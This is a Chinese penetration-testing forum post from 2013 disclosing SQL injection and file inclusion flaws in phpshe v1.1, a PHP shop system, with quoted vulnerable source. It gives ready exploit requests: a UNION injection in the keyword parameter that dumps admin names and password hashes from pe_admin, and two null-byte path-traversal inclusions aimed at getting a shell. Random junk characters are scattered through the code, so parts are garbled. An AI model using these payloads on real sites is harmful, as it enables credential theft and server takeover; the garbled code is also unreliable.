找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2376|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-19 19:01:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/% w3 T2 ^4 d6 B
/* Phpshe v1.1 Vulnerability
# i1 G$ a% _: j3 U  Y' u/* ========================! X; ?  A, [* z2 b
/* By: : Kn1f3, Q1 [3 }  l# Q6 o& z; ^! Q! e
/* E-Mail : 681796@qq.com
, ?5 v( j2 x  [* C2 \* _4 T, V/*******************************************************/7 d) f; ]7 Y" S
0×00 整体大概参数传输
& w3 u2 F. i9 r- k: t " u! \' M# ?  b3 p5 Q3 h

9 p. _' f& D, J* I$ K* f" M" q$ O" H; Q2 a  Y- W- K5 E' @( x
//common.php7 i: Y. ?/ c0 k. x2 |* y* B
if (get_magic_quotes_gpc()) {: j! k- Z- }6 Z/ l: g& ?. E; |
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');9 L, ^* H2 D! y& ^* S7 Y6 k! j
!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');3 i5 \- V6 {3 z1 r
}
5 r/ v3 N* R" ^. I7 z* delse {4 I7 V/ |+ \- `# P* h; ]9 A; P) a
!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');; C& @% O5 j4 h
!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');8 L! ]+ a! ?8 v
}. U- g( l% Z. K5 ~
session_start();
  h+ C( Y: I# K# [) ?1 M!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
! o: E+ v! S9 V4 r. M2 ~!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');
% m" Q3 n* T# Z! y9 e( O0 d) t/ ?6 U# T- ?8 [% {
0×01 包含漏洞
8 |, s6 D* ^2 M/ I  U0 G 5 i+ \; u' u, {  |4 f) ~
1 h3 [. d1 k1 ~* @7 K  }
//首页文件7 a* y5 @: p* p( S, m
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);8 \; V& }' J* j; t, O$ Q2 z
include("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
8 R# A+ I+ |- A( }; npe_result();
+ H/ l+ Y0 a2 ~# x?>+ y* v  C  d1 p+ M
//common 文件 第15行开始
! u( M% m. h( ^0 s" k8 S( Eurl路由配置1 Q- X  A& X8 _3 e: U
$module = $mod = $act = 'index';. p7 R# U) u2 y3 J! @2 W
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);# L7 s; F+ Z- u* ]: z
$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);
% n) c1 B6 x" @  j& C3 B$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);" z  X3 a; n+ d* }% G/ Y0 i  Q9 B9 T/ b
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%00
4 T" P( V) k5 y- |


% G3 u) D) X7 A  s& m" _
- ^$ y2 N  O$ s9 y 0×02 搜索注入/ ?& R& j: B, k1 A
: d$ F0 a7 z: F. Y
<code id="code2">

//product.php文件
3 N/ M2 e, N1 q) Ucase 'list':( x* _- J/ u/ B2 H" n
$category_id = intval($id);
5 M0 {6 t/ G* Z8 L1 w$info = $db->pe_select('category', array('category_id'=>$category_id));! T/ Z: d+ J" }& o5 w9 W4 z+ m3 T
//搜索
4 ?$ b5 |) A9 Y8 R$sqlwhere = " and `product_state` = 1";7 K" X9 y4 L  P
pe_lead('hook/category.hook.php');
* a, F/ u+ Z7 y3 I& ]0 [! bif ($category_id) {! K7 H: ~( K  D  P1 z8 p. d5 j- L  V
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
5 _4 d$ {' B6 l! z1 ~  m0 n  j}% z! T, U- l" k, F" l' |, \( l+ E* a
$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤6 q$ I; y8 ?; {* E
if ($_g_orderby) {
# v1 u' a* q8 L! ]9 f- K, n& t7 b4 S! b$orderby = explode('_', $_g_orderby);
! A* [0 ?# i, R4 ]+ h0 _( C$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";
, l! B9 n7 ?0 e6 v2 f}
; A- @9 N/ Z4 nelse {
0 {, K: ^/ G; N* e9 U3 T$ q$sqlwhere .= " order by `product_id` desc";/ N. p. E! p. s# z1 ?( T3 W6 D
}/ W& }$ q+ h$ {: }# d; v
$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));  }* S' Q5 o5 z& G+ j. o" W& S
//热卖排行* x: E- |9 s4 s7 r' L  z
$product_hotlist = product_hotlist();6 y' K6 r0 |" L  [
//当前路径
0 C" R5 N" j! B: q: x' ~$ E$nowpath = category_path($category_id);
9 {1 {6 @  d% p/ k$seo = pe_seo($info['category_name']);3 W& _) f  X! z6 A
include(pe_tpl('product_list.html'));
, i8 l$ O) c$ g# I//跟进selectall函数库
* H+ ?( _+ P) h9 w+ x. N( t( kpublic function pe_selectall($table, $where = '', $field = '*', $limit_page = array())1 {5 _; ?7 `/ z& t! p$ g
{
; O* A% h$ d1 x/ U! C% O6 G" ?2 T, y//处理条件语句
. y. U; Z3 M* L6 U( r4 ^6 p( Z$sqlwhere = $this->_dowhere($where);
8 w4 y8 j/ i4 z2 D3 T+ Preturn $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);/ R* [- `! a# P. D: n* G
}) D8 o3 N% K! p# J( ?4 l5 c
//exp1 u6 j% A6 S% G9 Q7 ]
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1& f$ Y/ `7 G0 \0 x9 V4 g

</code>% T0 v( [( s; O
6 }% n4 [5 C6 D  I. @
0×03 包含漏洞24 Y* f1 E, J8 m1 i& }
' P' p: q2 j* P: V1 ?' h: I) E
<code id="code3">

//order.php

case 'pay':

% j4 t$ |6 x3 a
$order_id = pe_dbhold($_g_id);


, C9 h. D. i$ m9 o# j3 ^' @$cache_payway = cache::get('payway');


0 ~2 e$ ^4 B! ?& mforeach($cache_payway as $k => $v) {


7 j6 c$ B  f) S7 \7 l1 ^, \$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

0 l9 N  ?0 _) V1 o3 q0 S
if ($k == 'bank') {

/ m2 v9 n3 c: B* @+ ^# ^4 S
$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);


' u( I: S* G3 z2 r}


1 x8 B& V$ u: C2 b}

5 v' v2 A. R: K
$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

) x6 y7 v- a+ \: I6 ]
!$order['order_id'] && pe_error('订单号错误...');


( M. `3 m" N3 C6 S$ @if (isset($_p_pesubmit)) {


; j3 J0 K0 b  z, |4 Yif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


/ C% x- t& O4 o# V8 p1 u$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));

# q) S* u) f. X5 L4 I. Q
foreach ($info_list as $v) {


- n$ R. E# A9 n# c8 i  n# j$order['order_name'] .= "{$v['product_name']};";' z3 P8 r5 a, c  z8 F( q' P* x


4 S4 v4 u0 {. U. S9 F7 c}


+ f$ d& G2 M. P0 W. n1 N, [echo '正在为您连接支付网站,请稍后...';


9 c" B# ~% m9 M; n  \2 u8 h) L) minclude("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


% `$ X. a! E& S* g}//当一切准备好的时候就可以进行"鸡肋包含了"


7 e3 p2 U  C( k3 xelse {


5 j. {  g2 I  \; Q$ s7 e4 o; l" Z2 `+ ape_error('支付错误...');

0 G6 S7 X0 O$ ?$ s! o7 w
}


, a& }- k4 N, q}

8 n/ @# s/ o$ y; L) A6 W0 O# x. C
$seo = pe_seo('选择支付方式');


7 J  }# M" X8 @include(pe_tpl('order_pay.html'));


' O# B9 j7 i; O0 i7 J6 Rbreak;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>) x- k7 v$ \! K8 k2 p# f- x

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表